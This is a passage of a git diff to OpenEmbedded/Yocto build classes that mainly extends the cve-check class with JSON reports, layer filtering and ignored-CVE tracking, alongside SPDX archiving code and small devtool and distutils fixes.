+ return
+
+ visited_docs.add(path)
+
+ with path.open("rb") as f:
+ doc, sha1 = oe.sbom.read_doc(f)
+ f.seek(0)
+
+ if doc.documentNamespace in visited_docs:
+ return
+
+ bb.note("Adding SPDX document %s" % path)
+ visited_docs.add(doc.documentNamespace)
+ info = tar.gettarinfo(fileobj=f)
+
+ info.name = doc.name + ".spdx.json"
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ if source_date_epoch is not None and info.mtime > int(source_date_epoch):
+ info.mtime = int(source_date_epoch)
+
+ tar.addfile(info, f)
+
+ index["documents"].append({
+ "filename": info.name,
+ "documentNamespace": doc.documentNamespace,
+ "sha1": sha1,
+ })
+
+ for ref in doc.externalDocumentRefs:
+ ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
+ collect_spdx_document(ref_path)
+
+ collect_spdx_document(image_spdx_path)
+
+ index["documents"].sort(key=lambda x: x["filename"])
+
+ index_str = io.BytesIO(json.dumps(
+ index,
+ sort_keys=True,
+ indent=get_json_indent(d),
+ ).encode("utf-8"))
+
+ info = tarfile.TarInfo()
+ info.name = "index.json"
+ info.size = len(index_str.getvalue())
+ info.uid = 0
+ info.gid = 0
+ info.uname = "root"
+ info.gname = "root"
+
+ tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+# Include this class when you don't care what version of SPDX you get; it will
+# be updated to the latest stable version that is supported
+inherit create-spdx-2.2
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 17f64a8a9c..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
# the only method to check against CVEs. Running this tool
# doesn't guarantee your packages are free of CVEs.
-# The product name that the CVE database uses. Defaults to BPN, but may need to
+# The product name that the CVE database uses; it defaults to BPN, but may need to
# be overridden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
CVE_PRODUCT ??= "${BPN}"
CVE_VERSION ??= "${PV}"
CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
-CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db"
+CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
CVE_CHECK_LOG ?= "${T}/cve.log"
@@ -34,25 +34,80 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
+CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
+CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
+
+CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
-CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
+CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
+CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
+CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
CVE_CHECK_COPY_FILES ??= "1"
CVE_CHECK_CREATE_MANIFEST ??= "1"
+# Report Patched or Ignored/Whitelisted CVEs
+CVE_CHECK_REPORT_PATCHED ??= "1"
+
+CVE_CHECK_SHOW_WARNINGS ??= "1"
+
+# Provide text output
+CVE_CHECK_FORMAT_TEXT ??= "1"
+
+# Provide JSON output - disabled by default for backward compatibility
+CVE_CHECK_FORMAT_JSON ??= "0"
+
+# Check for packages without CVEs (no issues or missing product name)
+CVE_CHECK_COVERAGE ??= "1"
+
# Whitelist for packages (PN)
CVE_CHECK_PN_WHITELIST ?= ""
# Whitelist for CVE. If a CVE is found, then it is considered patched.
# The value is a string containing space separated CVE values:
-#
+#
# CVE_CHECK_WHITELIST = 'CVE-2014-2524 CVE-2018-1234'
-#
+#
CVE_CHECK_WHITELIST ?= ""
+# Layers to be excluded
+CVE_CHECK_LAYER_EXCLUDELIST ??= ""
+
+# Layers to be included
+CVE_CHECK_LAYER_INCLUDELIST ??= ""
+
+
+# Set to "alphabetical" for versions that use a single alphabetical character as the incremental release suffix
+CVE_VERSION_SUFFIX ??= ""
+
+def generate_json_report(d, out_path, link_path):
+ if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
+ import json
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
+
+ bb.note("Generating JSON CVE summary")
+ index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ summary = {"version":"1", "package": []}
+ with open(index_file) as f:
+ filename = f.readline()
+ while filename:
+ with open(filename.rstrip()) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(summary, data)
+ filename = f.readline()
+
+ summary["package"].sort(key=lambda d: d['name'])
+
+ with open(out_path, "w") as f:
+ json.dump(summary, f, indent=2)
+
+ update_symlinks(out_path, link_path)
+
python cve_save_summary_handler () {
import shutil
import datetime
+ from oe.cve_check import update_symlinks
cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
@@ -65,13 +120,15 @@ python cve_save_summary_handler () {
if os.path.exists(cve_tmp_file):
shutil.copyfile(cve_tmp_file, cve_summary_file)
-
- if cve_summary_file and os.path.exists(cve_summary_file):
- cvefile_link = os.path.join(cvelogpath, cve_summary_name)
-
- if os.path.exists(os.path.realpath(cvefile_link)):
- os.remove(cvefile_link)
- os.symlink(os.path.basename(cve_summary_file), cvefile_link)
+ cvefile_link = os.path.join(cvelogpath, cve_summary_name)
+ update_symlinks(cve_summary_file, cvefile_link)
+ bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
+
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
+ json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
+ generate_json_report(d, json_summary_name, json_summary_link_name)
+ bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
}
addhandler cve_save_summary_handler
@@ -81,23 +138,25 @@ python do_cve_check () {
"""
Check recipe for patched and unpatched CVEs
"""
+ from oe.cve_check import get_patched_cves
- if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
- try:
- patched_cves = get_patches_cves(d)
- except FileNotFoundError:
- bb.fatal("Failure in searching patches")
- whitelisted, patched, unpatched = check_cves(d, patched_cves)
- if patched or unpatched:
- cve_data = get_cve_info(d, patched + unpatched)
- cve_write_data(d, patched, unpatched, whitelisted, cve_data)
- else:
- bb.note("No CVE database found, skipping CVE check")
+ with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
+ if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
+ try:
+ patched_cves = get_patched_cves(d)
+ except FileNotFoundError:
+ bb.fatal("Failure in searching patches")
+ ignored, patched, unpatched, status = check_cves(d, patched_cves)
+ if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
+ cve_data = get_cve_info(d, patched + unpatched + ignored)
+ cve_write_data(d, patched, unpatched, ignored, cve_data, status)
+ else:
+ bb.note("No CVE database found, skipping CVE check")
}
-addtask cve_check before do_build after do_fetch
-do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db"
+addtask cve_check before do_build
+do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
do_cve_check[nostamp] = "1"
python cve_check_cleanup () {
@@ -105,10 +164,11 @@ python cve_check_cleanup () {
Delete the file used to gather all the CVE information.
"""
bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
+ bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
}
addhandler cve_check_cleanup
-cve_check_cleanup[eventmask] = "bb.cooker.CookerExit"
+cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
python cve_check_write_rootfs_manifest () {
"""
@@ -116,111 +176,107 @@ python cve_check_write_rootfs_manifest () {
"""
import shutil
+ import json
+ from oe.rootfs import image_list_installed_packages
+ from oe.cve_check import cve_check_merge_jsons, update_symlinks
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- deploy_file = os.path.join(d.getVar("CVE_CHECK_DIR"), d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
if os.path.exists(deploy_file):
bb.utils.remove(deploy_file)
-
- if os.path.exists(d.getVar("CVE_CHECK_TMP_FILE")):
- bb.note("Writing rootfs CVE manifest")
- deploy_dir = d.getVar("DEPLOY_DIR_IMAGE")
- link_name = d.getVar("IMAGE_LINK_NAME")
+ deploy_file_json = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(deploy_file_json):
+ bb.utils.remove(deploy_file_json)
+
+ # Create a list of relevant recipes
+ recipies = set()
+ for pkg in list(image_list_installed_packages(d)):
+ pkg_info = os.path.join(d.getVar('PKGDATA_DIR'),
+ 'runtime-reverse', pkg)
+ pkg_data = oe.packagedata.read_pkgdatafile(pkg_info)
+ recipies.add(pkg_data["PN"])
+
+ bb.note("Writing rootfs CVE manifest")
+ deploy_dir = d.getVar("IMGDEPLOYDIR")
+ link_name = d.getVar("IMAGE_LINK_NAME")
+
+ json_data = {"version":"1", "package": []}
+ text_data = ""
+ enable_json = d.getVar("CVE_CHECK_FORMAT_JSON") == "1"
+ enable_text = d.getVar("CVE_CHECK_FORMAT_TEXT") == "1"
+
+ save_pn = d.getVar("PN")
+
+ for pkg in recipies:
+ # To be able to use the CVE_CHECK_RECIPE_FILE variable we have to evaluate
+ # it with the different PN names set each time.
+ d.setVar("PN", pkg)
+ if enable_text:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as pfile:
+ text_data += pfile.read()
+
+ if enable_json:
+ pkgfilepath = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ if os.path.exists(pkgfilepath):
+ with open(pkgfilepath) as j:
+ data = json.load(j)
+ cve_check_merge_jsons(json_data, data)
+
+ d.setVar("PN", save_pn)
+
+ if enable_text:
+ link_path = os.path.join(deploy_dir, "%s.cve" % link_name)
manifest_name = d.getVar("CVE_CHECK_MANIFEST")
- cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
- shutil.copyfile(cve_tmp_file, manifest_name)
+ with open(manifest_name, "w") as f:
+ f.write(text_data)
- if manifest_name and os.path.exists(manifest_name):
- manifest_link = os.path.join(deploy_dir, "%s.cve" % link_name)
- # If we already have another manifest, update symlinks
- if os.path.exists(os.path.realpath(manifest_link)):
- os.remove(manifest_link)
- os.symlink(os.path.basename(manifest_name), manifest_link)
- bb.plain("Image CVE report stored in: %s" % manifest_name)
-}
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE report stored in: %s" % manifest_name)
-ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
-
-def get_patches_cves(d):
- """
- Get patches that solve CVEs using the "CVE: " tag.
- """
-
- import re
+ if enable_json:
+ link_path = os.path.join(deploy_dir, "%s.json" % link_name)
+ manifest_name = d.getVar("CVE_CHECK_MANIFEST_JSON")
- pn = d.getVar("PN")
- cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
-
- # Matches last CVE-1234-211432 in the file name, also if written
- # with small letters. Not supporting multiple CVE id's in a single
- # file name.
- cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
-
- patched_cves = set()
- bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
- for url in src_patches(d):
- patch_file = bb.fetch.decodeurl(url)[2]
-
- if not os.path.isfile(patch_file):
- bb.error("File Not found: %s" % patch_file)
- raise FileNotFoundError
-
- # Check patch file name for CVE ID
- fname_match = cve_file_name_match.search(patch_file)
- if fname_match:
- cve = fname_match.group(1).upper()
- patched_cves.add(cve)
- bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
-
- with open(patch_file, "r", encoding="utf-8") as f:
- try:
- patch_text = f.read()
- except UnicodeDecodeError:
- bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
- " trying with iso8859-1" % patch_file)
- f.close()
- with open(patch_file, "r", encoding="iso8859-1") as f:
- patch_text = f.read()
-
- # Search for one or more "CVE: " lines
- text_match = False
- for match in cve_match.finditer(patch_text):
- # Get only the CVEs without the "CVE: " tag
- cves = patch_text[match.start()+5:match.end()]
- for cve in cves.split():
- bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
- patched_cves.add(cve)
- text_match = True
+ with open(manifest_name, "w") as f:
+ json.dump(json_data, f, indent=2)
- if not fname_match and not text_match:
- bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+ update_symlinks(manifest_name, link_path)
+ bb.plain("Image CVE JSON report stored in: %s" % manifest_name)
+}
- return patched_cves
+ROOTFS_POSTPROCESS_COMMAND_prepend = "${@'cve_check_write_rootfs_manifest; ' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_rootfs[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
+do_populate_sdk[recrdeptask] += "${@'do_cve_check' if d.getVar('CVE_CHECK_CREATE_MANIFEST') == '1' else ''}"
def check_cves(d, patched_cves):
"""
Connect to the NVD database and find unpatched cves.
"""
- from distutils.version import LooseVersion
+ from oe.cve_check import Version, convert_cve_version
+
+ pn = d.getVar("PN")
+ real_pv = d.getVar("PV")
+ suffix = d.getVar("CVE_VERSION_SUFFIX")
cves_unpatched = []
+ cves_ignored = []
+ cves_status = []
+ cves_in_recipe = False
# CVE_PRODUCT can contain more than one product (eg. curl/libcurl)
products = d.getVar("CVE_PRODUCT").split()
# If this has been unset then we're not scanning for CVEs here (for example, image recipes)
if not products:
- return ([], [], [])
+ return ([], [], [], [])
pv = d.getVar("CVE_VERSION").split("+git")[0]
- # If the recipe has been whitlisted we return empty lists
- if d.getVar("PN") in d.getVar("CVE_CHECK_PN_WHITELIST").split():
+ # If the recipe has been whitelisted we return empty lists
+ if pn in d.getVar("CVE_CHECK_PN_WHITELIST").split():
bb.note("Recipe has been whitelisted, skipping check")
- return ([], [], [])
+ return ([], [], [], [])
- old_cve_whitelist = d.getVar("CVE_CHECK_CVE_WHITELIST")
- if old_cve_whitelist:
- bb.warn("CVE_CHECK_CVE_WHITELIST is deprecated, please use CVE_CHECK_WHITELIST.")
cve_whitelist = d.getVar("CVE_CHECK_WHITELIST").split()
import sqlite3
@@ -229,36 +285,50 @@ def check_cves(d, patched_cves):
# For each of the known product names (e.g. curl has CPEs using curl and libcurl)...
for product in products:
+ cves_in_product = False
if ":" in product:
vendor, product = product.split(":", 1)
else:
vendor = "%"
# Find all relevant CVE IDs.
- for cverow in conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor)):
+ cve_cursor = conn.execute("SELECT DISTINCT ID FROM PRODUCTS WHERE PRODUCT IS ? AND VENDOR LIKE ?", (product, vendor))
+ for cverow in cve_cursor:
cve = cverow[0]
if cve in cve_whitelist:
bb.note("%s-%s has been whitelisted for %s" % (product, pv, cve))
- # TODO: this should be in the report as 'whitelisted'
- patched_cves.add(cve)
+ cves_ignored.append(cve)
continue
elif cve in patched_cves:
bb.note("%s has been patched" % (cve))
continue
+ # Write the status only once for each product
+ if not cves_in_product:
+ cves_status.append([product, True])
+ cves_in_product = True
+ cves_in_recipe = True
vulnerable = False
- for row in conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor)):
+ ignored = False
+
+ product_cursor = conn.execute("SELECT * FROM PRODUCTS WHERE ID IS ? AND PRODUCT IS ? AND VENDOR LIKE ?", (cve, product, vendor))
+ for row in product_cursor:
(_, _, _, version_start, operator_start, version_end, operator_end) = row
#bb.debug(2, "Evaluating row " + str(row))
+ if cve in cve_whitelist:
+ ignored = True
+
+ version_start = convert_cve_version(version_start)
+ version_end = convert_cve_version(version_end)
if (operator_start == '=' and pv == version_start) or version_start == '-':
vulnerable = True
else:
if operator_start:
try:
- vulnerable_start = (operator_start == '>=' and LooseVersion(pv) >= LooseVersion(version_start))
- vulnerable_start |= (operator_start == '>' and LooseVersion(pv) > LooseVersion(version_start))
+ vulnerable_start = (operator_start == '>=' and Version(pv,suffix) >= Version(version_start,suffix))
+ vulnerable_start |= (operator_start == '>' and Version(pv,suffix) > Version(version_start,suffix))
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_start, version_start, cve))
@@ -268,8 +338,8 @@ def check_cves(d, patched_cves):
if operator_end:
try:
- vulnerable_end = (operator_end == '<=' and LooseVersion(pv) <= LooseVersion(version_end))
- vulnerable_end |= (operator_end == '<' and LooseVersion(pv) < LooseVersion(version_end))
+ vulnerable_end = (operator_end == '<=' and Version(pv,suffix) <= Version(version_end,suffix) )
+ vulnerable_end |= (operator_end == '<' and Version(pv,suffix) < Version(version_end,suffix) )
except:
bb.warn("%s: Failed to compare %s %s %s for %s" %
(product, pv, operator_end, version_end, cve))
@@ -283,18 +353,27 @@ def check_cves(d, patched_cves):
vulnerable = vulnerable_start or vulnerable_end
if vulnerable:
- bb.note("%s-%s is vulnerable to %s" % (product, pv, cve))
- cves_unpatched.append(cve)
+ if ignored:
+ bb.note("%s is ignored in %s-%s" % (cve, pn, real_pv))
+ cves_ignored.append(cve)
+ else:
+ bb.note("%s-%s is vulnerable to %s" % (pn, real_pv, cve))
+ cves_unpatched.append(cve)
break
+ product_cursor.close()
if not vulnerable:
- bb.note("%s-%s is not vulnerable to %s" % (product, pv, cve))
- # TODO: not patched but not vulnerable
+ bb.note("%s-%s is not vulnerable to %s" % (pn, real_pv, cve))
patched_cves.add(cve)
+ cve_cursor.close()
+
+ if not cves_in_product:
+ bb.note("No CVE records found for product %s, pn %s" % (product, pn))
+ cves_status.append([product, False])
conn.close()
- return (list(cve_whitelist), list(patched_cves), cves_unpatched)
+ return (list(cves_ignored), list(patched_cves), cves_unpatched, cves_status)
def get_cve_info(d, cves):
"""
@@ -304,39 +383,66 @@ def get_cve_info(d, cves):
import sqlite3
cve_data = {}
- conn = sqlite3.connect(d.getVar("CVE_CHECK_DB_FILE"))
+ db_file = d.expand("file:${CVE_CHECK_DB_FILE}?mode=ro")
+ conn = sqlite3.connect(db_file, uri=True)
for cve in cves:
- for row in conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,)):
+ cursor = conn.execute("SELECT * FROM NVD WHERE ID IS ?", (cve,))
+ for row in cursor:
cve_data[row[0]] = {}
cve_data[row[0]]["summary"] = row[1]
cve_data[row[0]]["scorev2"] = row[2]
cve_data[row[0]]["scorev3"] = row[3]
cve_data[row[0]]["modified"] = row[4]
cve_data[row[0]]["vector"] = row[5]
-
+ cursor.close()
conn.close()
return cve_data
-def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
+def cve_write_data_text(d, patched, unpatched, whitelisted, cve_data):
"""
Write CVE information to WORKDIR, to CVE_CHECK_DIR, and to the
CVE manifest if enabled.
"""
cve_file = d.getVar("CVE_CHECK_LOG")
- nvd_link = "https://web.nvd.nist.gov/view/vuln/detail?vulnId="
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ # Early exit, the text format does not report packages without CVEs
+ if not patched+unpatched+whitelisted:
+ return
+
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
write_string = ""
unpatched_cves = []
bb.utils.mkdirhier(os.path.dirname(cve_file))
for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in whitelisted
+
+ if (is_patched or is_ignored) and not report_all:
+ continue
+
+ write_string += "LAYER: %s\n" % layer
write_string += "PACKAGE NAME: %s\n" % d.getVar("PN")
write_string += "PACKAGE VERSION: %s%s\n" % (d.getVar("EXTENDPE"), d.getVar("PV"))
write_string += "CVE: %s\n" % cve
- if cve in whitelisted:
+ if is_ignored:
write_string += "CVE STATUS: Whitelisted\n"
- elif cve in patched:
+ elif is_patched:
write_string += "CVE STATUS: Patched\n"
else:
unpatched_cves.append(cve)
@@ -347,7 +453,7 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
write_string += "VECTOR: %s\n" % cve_data[cve]["vector"]
write_string += "MORE INFORMATION: %s%s\n\n" % (nvd_link, cve)
- if unpatched_cves:
+ if unpatched_cves and d.getVar("CVE_CHECK_SHOW_WARNINGS") == "1":
bb.warn("Found unpatched CVE (%s), for more information check %s" % (" ".join(unpatched_cves),cve_file))
with open(cve_file, "w") as f:
@@ -355,9 +461,8 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
f.write(write_string)
if d.getVar("CVE_CHECK_COPY_FILES") == "1":
- cve_dir = d.getVar("CVE_CHECK_DIR")
- bb.utils.mkdirhier(cve_dir)
- deploy_file = os.path.join(cve_dir, d.getVar("PN"))
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE")
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
with open(deploy_file, "w") as f:
f.write(write_string)
@@ -367,3 +472,119 @@ def cve_write_data(d, patched, unpatched, whitelisted, cve_data):
with open(d.getVar("CVE_CHECK_TMP_FILE"), "a") as f:
f.write("%s" % write_string)
+
+def cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file):
+ """
+ Write CVE information in the JSON format: to WORKDIR and to
+ CVE_CHECK_DIR; if the CVE manifest is enabled, also write fragment
+ files that will be assembled at the end in cve_check_write_rootfs_manifest.
+ """
+
+ import json
+
+ write_string = json.dumps(output, indent=2)
+ with open(direct_file, "w") as f:
+ bb.note("Writing file %s with CVE information" % direct_file)
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_COPY_FILES") == "1":
+ bb.utils.mkdirhier(os.path.dirname(deploy_file))
+ with open(deploy_file, "w") as f:
+ f.write(write_string)
+
+ if d.getVar("CVE_CHECK_CREATE_MANIFEST") == "1":
+ cvelogpath = d.getVar("CVE_CHECK_SUMMARY_DIR")
+ index_path = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
+ bb.utils.mkdirhier(cvelogpath)
+ fragment_file = os.path.basename(deploy_file)
+ fragment_path = os.path.join(cvelogpath, fragment_file)
+ with open(fragment_path, "w") as f:
+ f.write(write_string)
+ with open(index_path, "a+") as f:
+ f.write("%s\n" % fragment_path)
+
+def cve_write_data_json(d, patched, unpatched, ignored, cve_data, cve_status):
+ """
+ Prepare CVE data for the JSON format, then write it.
+ """
+
+ output = {"version":"1", "package": []}
+ nvd_link = "https://nvd.nist.gov/vuln/detail/"
+
+ fdir_name = d.getVar("FILE_DIRNAME")
+ layer = fdir_name.split("/")[-3]
+
+ include_layers = d.getVar("CVE_CHECK_LAYER_INCLUDELIST").split()
+ exclude_layers = d.getVar("CVE_CHECK_LAYER_EXCLUDELIST").split()
+
+ report_all = d.getVar("CVE_CHECK_REPORT_PATCHED") == "1"
+
+ if exclude_layers and layer in exclude_layers:
+ return
+
+ if include_layers and layer not in include_layers:
+ return
+
+ unpatched_cves = []
+
+ product_data = []
+ for s in cve_status:
+ p = {"product": s[0], "cvesInRecord": "Yes"}
+ if s[1] == False:
+ p["cvesInRecord"] = "No"
+ product_data.append(p)
+
+ package_version = "%s%s" % (d.getVar("EXTENDPE"), d.getVar("PV"))
+ package_data = {
+ "name" : d.getVar("PN"),
+ "layer" : layer,
+ "version" : package_version,
+ "products": product_data
+ }
+ cve_list = []
+
+ for cve in sorted(cve_data):
+ is_patched = cve in patched
+ is_ignored = cve in ignored
+ status = "Unpatched"
+ if (is_patched or is_ignored) and not report_all:
+ continue
+ if is_ignored:
+ status = "Ignored"
+ elif is_patched:
+ status = "Patched"
+ else:
+ # default value of status is Unpatched
+ unpatched_cves.append(cve)
+
+ issue_link = "%s%s" % (nvd_link, cve)
+
+ cve_item = {
+ "id" : cve,
+ "summary" : cve_data[cve]["summary"],
+ "scorev2" : cve_data[cve]["scorev2"],
+ "scorev3" : cve_data[cve]["scorev3"],
+ "vector" : cve_data[cve]["vector"],
+ "status" : status,
+ "link": issue_link
+ }
+ cve_list.append(cve_item)
+
+ package_data["issue"] = cve_list
+ output["package"].append(package_data)
+
+ direct_file = d.getVar("CVE_CHECK_LOG_JSON")
+ deploy_file = d.getVar("CVE_CHECK_RECIPE_FILE_JSON")
+ manifest_file = d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON")
+
+ cve_check_write_json_output(d, output, direct_file, deploy_file, manifest_file)
+
+def cve_write_data(d, patched, unpatched, ignored, cve_data, status):
+ """
+ Write CVE data in each enabled format.
+ """
+
+ if d.getVar("CVE_CHECK_FORMAT_TEXT") == "1":
+ cve_write_data_text(d, patched, unpatched, ignored, cve_data)
+ if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
+ cve_write_data_json(d, patched, unpatched, ignored, cve_data, status)
diff --git a/meta/classes/devshell.bbclass b/meta/classes/devshell.bbclass
index fdf7dc100f..76dd0b42ee 100644
--- a/meta/classes/devshell.bbclass
+++ b/meta/classes/devshell.bbclass
@@ -128,6 +128,7 @@ def devpyshell(d):
more = i.runsource(source, "<pyshell>")
if not more:
buf = []
+ sys.stderr.flush()
prompt(more)
except KeyboardInterrupt:
i.write("\nKeyboardInterrupt\n")
diff --git a/meta/classes/devtool-source.bbclass b/meta/classes/devtool-source.bbclass
index 280d6009f3..41900e651f 100644
--- a/meta/classes/devtool-source.bbclass
+++ b/meta/classes/devtool-source.bbclass
@@ -199,6 +199,7 @@ python devtool_post_patch() {
# Run do_patch function with the override applied
localdata = bb.data.createCopy(d)
localdata.setVar('OVERRIDES', ':'.join(no_overrides))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the dev branch with the no-overrides one
@@ -216,7 +217,8 @@ python devtool_post_patch() {
# Reset back to the initial commit on a new branch
bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir)
# Run do_patch function with the override applied
- localdata.appendVar('OVERRIDES', ':%s' % override)
+ localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override]))
+ localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override]))
bb.build.exec_func('do_patch', localdata)
rm_patches()
# Now we need to reconcile the new branch with the no-overrides one
diff --git a/meta/classes/devupstream.bbclass b/meta/classes/devupstream.bbclass
index 7780c5482c..97e137cb40 100644
--- a/meta/classes/devupstream.bbclass
+++ b/meta/classes/devupstream.bbclass
@@ -4,7 +4,7 @@
#
# Usage:
# BBCLASSEXTEND = "devupstream:target"
-# SRC_URI_class-devupstream = "git://git.example.com/example"
+# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master"
# SRCREV_class-devupstream = "abcdef"
#
# If the first entry in SRC_URI is a git: URL then S is rewritten to
diff --git a/meta/classes/distutils-common-base.bbclass b/meta/classes/distutils-common-base.bbclass
index 94b5fd426d..43a38e5a3a 100644
--- a/meta/classes/distutils-common-base.bbclass
+++ b/meta/classes/distutils-common-base.bbclass
@@ -11,7 +11,7 @@ export LDCXXSHARED = "${CXX} -shared"
export CCSHARED = "-fPIC -DPIC"
# LINKFORSHARED are the flags passed to the $(CC) command that links
# the python executable
-export LINKFORSHARED = "{SECURITY_CFLAGS} -Xlinker -export-dynamic"
+export LINKFORSHARED = "${SECURITY_CFLAGS} -Xlinker -export-dynamic"
FILES_${PN} += "${libdir}/* ${libdir}/${PYTHON_DIR}/*"
diff --git a/meta/classes/distutils3-base.bbclass b/meta/classes/distutils3-base.bbclass
index 7dbf07ac4b..a277d1c7bc 100644
--- a/meta/classes/distutils3-base.bbclass
+++ b/meta/classes/distutils3-base.bbclass
@@ -1,5 +1,5 @@
DEPENDS += "${@["${PYTHON_PN}-native ${PYTHON_PN}", ""][(d.getVar('PACKAGES') == '')]}"
RDEPENDS_${PN} += "${@['', '${PYTHON_PN}-core']['${CLASSOVERRIDE}' == 'class-target']}"
-inherit distutils-common-base python3native
+inherit distutils-common-base python3native python3targetconfig
